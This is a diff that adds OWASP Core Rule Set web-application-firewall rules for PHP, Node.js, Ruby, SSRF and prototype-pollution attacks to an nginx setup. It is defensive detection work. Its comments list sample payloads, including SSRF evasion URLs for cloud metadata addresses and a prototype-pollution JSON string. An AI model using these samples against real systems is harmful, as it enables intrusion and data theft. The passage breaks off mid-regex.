+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \ + "id:933131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: Low-Value PHP Function Calls ] +# +# In paranoia level 3, we add additional checks for the remaining PHP functions. +# +# Most of these function names are likely to cause false positives in natural text +# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'. +# Therefore, these function names are not scanned in lower paranoia levels. +# +# To mitigate the risk of false positives somewhat, a regexp is used to look for +# PHP function syntax. (See rule 933160 for a description.) +# +# This rule is a stricter sibling of rule 933160. +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regular expression generated from regex-assembly/933161.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933161 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)" \ + "id:933161,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Script Uploads: Superfluous extension ] +# +# Block file uploads with PHP related extensions (.php, .phps, .phtml, +# .php5 etc) anywhere in the name, followed by a dot. 
+# +# Example: index.php.tmp +# +# Uploading of such files can lead to remote code execution if +# Apache is configured with AddType and MultiViews, as Apache will +# automatically do a filename match when the extension is unknown. +# This configuration is fortunately not common in modern installs. +# +# Blocking these file names might lead to more false positives. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +# This rule is a stricter sibling of rule 933110. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ + "id:933111,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Closing Tag Found ] +# +# http://www.php.net/manual/en/language.basic-syntax.phptags.php +# +# This check was extracted from 933100 (paranoia level 1), since the +# checked sequence '?>' commonly causes false positives. +# See issue #654 for discussion. 
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \
+ "id:933190,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,\
+ msg:'PHP Injection Attack: PHP Closing Tag Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ tag:'paranoia-level/3',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+# [ PHP Functions: Variable Function Prevent Bypass ]
+#
+# This rule is a stricter sibling of 933210.
+# Unlike 933210, this rule will also match "this is a 'dog' (not a cat)", because the semi-colon at the end of the string is optional.
+# This is useful for PHP evals where the semi-colon is already hardcoded:
+#
+#
+# Any potential function calls not at the end of a string will require a semi-colon to form valid PHP, which is automatically covered by 933210.
+#
+# Regular expression generated from regex-assembly/933211.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 933211
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\)(?:;|$)?" 
\
+ "id:933211,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\
+ msg:'PHP Injection Attack: Variable Function Call Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'paranoia-level/3',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
new file mode 100644
index 00000000..354390e3
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
@@ -0,0 +1,366 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+
+# [ NodeJS Insecure unserialization / generic RCE signatures ]
+#
+# Libraries performing insecure unserialization:
+# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941)
+# - funcster: __js_function
+#
+# See:
+# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
+# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
+#
+# Some generic snippets used:
+# - function() {
+# - new Function(
+# - eval(
+# - String.fromCharCode(
+#
+# Last two are used by nodejsshell.py,
+# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
+#
+# As base64 is sometimes (but not always) used to encode serialized values,
+# use multiMatch and t:base64decode.
+#
+# Regular expression generated from regex-assembly/934100.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934100 +# +# Stricter sibling: 934101 +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\v]+Function[\s\v]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\v]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,\ + msg:'Node.js Injection Attack 
1/2',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-javascript',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'attack-injection-generic',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ multiMatch,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# -=[ SSRF Attacks ]=-
+#
+# We provide only partial protection to SSRF. DNS Rebinding attacks needs
+# to be handled at application level, and even those might be difficult to catch.
+#
+# PL1 rules are based on common attacks on cloud providers, based on well-known URLs.
+#
+# -=[ References ]=-
+# https://highon.coffee/blog/ssrf-cheat-sheet/
+# https://cwe.mitre.org/data/definitions/918.html
+# https://capec.mitre.org/data/definitions/664.html)
+#
+# Preventing: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf.data" \
+ "id:934110,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Possible Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-ssrf',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/225/664',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# JavaScript prototype pollution injection attempts
+#
+# Example from https://hackerone.com/reports/869574 critical
+# vulnerability in the TypeORM library:
+# 
{"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} +# +# Test cases are based on this list of payloads: +# https://github.com/BlackFan/client-side-prototype-pollution/blob/master/README.md +# +# See also: https://cwe.mitre.org/data/definitions/1321.html +# +# Note: only server-based (not DOM-based) attacks are covered here. +# Stricter sibling: 934131 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\[)\s*prototype)" \ + "id:934130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,\ + msg:'JavaScript Prototype Pollution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1/180/77',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Ruby generic RCE signatures ] +# +# Detects Ruby-based injection attacks. +# Example: Process.spawn("id") +# +# Regular expression generated from regex-assembly/934150.ra. 
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 934150
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Process[\s\v]*\.[\s\v]*spawn[\s\v]*\(" \
+ "id:934150,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Ruby Injection Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-ruby',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'attack-injection-generic',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# [ NodeJS DoS signatures ]
+#
+# NodeJS runs in a single thread, so any evaluated payloads that block execution can cause an easy DoS.
+# This rule attempts to block e.g. while(true).
+#
+# Regular expression generated from regex-assembly/934160.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934160 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx while[\s\v]*\([\s\v\(]*(?:!+(?:false|null|undefined|NaN|[\+\-]?0|\"{2}|'{2}|`{2})|(?:!!)*(?:(?:t(?:rue|his)|[\+\-]?(?:Infinity|[1-9][0-9]*)|new [A-Za-z][0-9A-Z_a-z]*|window|String|(?:Boolea|Functio)n|Object|Array)\b|\{.*\}|\[.*\]|\"[^\"]+\"|'[^']+'|`[^`]+`)).*\)" \ + "id:934160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:replaceComments,\ + msg:'Node.js DoS attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP data: scheme ] +# +# PHP supports the `data:` scheme without using `//` before the content-type. +# +# Regular expression generated from regex-assembly/934170.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934170 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^data:(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*" \ + "id:934170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP data scheme attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+#
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
+#
+
+# This rule is a stricter sibling of 934100.
+SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\v]*\(" \
+ "id:934101,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\
+ msg:'Node.js Injection Attack 2/2',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-javascript',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'attack-injection-generic',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ multiMatch,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# -=[ SSRF Attacks ]=-
+#
+# PL2 rules adds SSRF capture for common evasion techniques.
+# +# We add captures for these evasion techniques: (see source in util/regexp-assemble/data/regexp-934120.data) +# http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) +# http://2852039166/ Dotless decimal - \d{10} +# http://7147006462/ Dotless decimal with overflow - \d{10} +# http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal - (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} +# http://0xA9FEA9FE/ Dotless hexadecimal - 0x[a-f0-9]{8} +# http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow - 0x[a-f0-9]{16} +# http://0251.0376.0251.0376/ Dotted octal - Covered by the same below +# http://0251.00376.000251.0000376/ Dotted octal with padding - (?:0{1,4}\d{3}\.){3}0{1,4}\d{3}) +# http://169.254.43518/ - (?:\d{1,3}\.){2}\.\d{5} +# http://169.16689662/ - \d{1,3}\.\d{8} +# http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below) +# http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded - (?:(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)|(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 - ((?:[0-9a-fA-F]{1,4}:){6}(?:(25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[::] +# http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) +# 
http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) +# http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) +# http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ +# http://google.com:80+&@google.com:80#+@127.88.23.245:22/ +# +# Regular expression generated from regex-assembly/934120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934120 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)((?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\--\.0-9A-Z_a-z]{1,255}:[0-9]{1,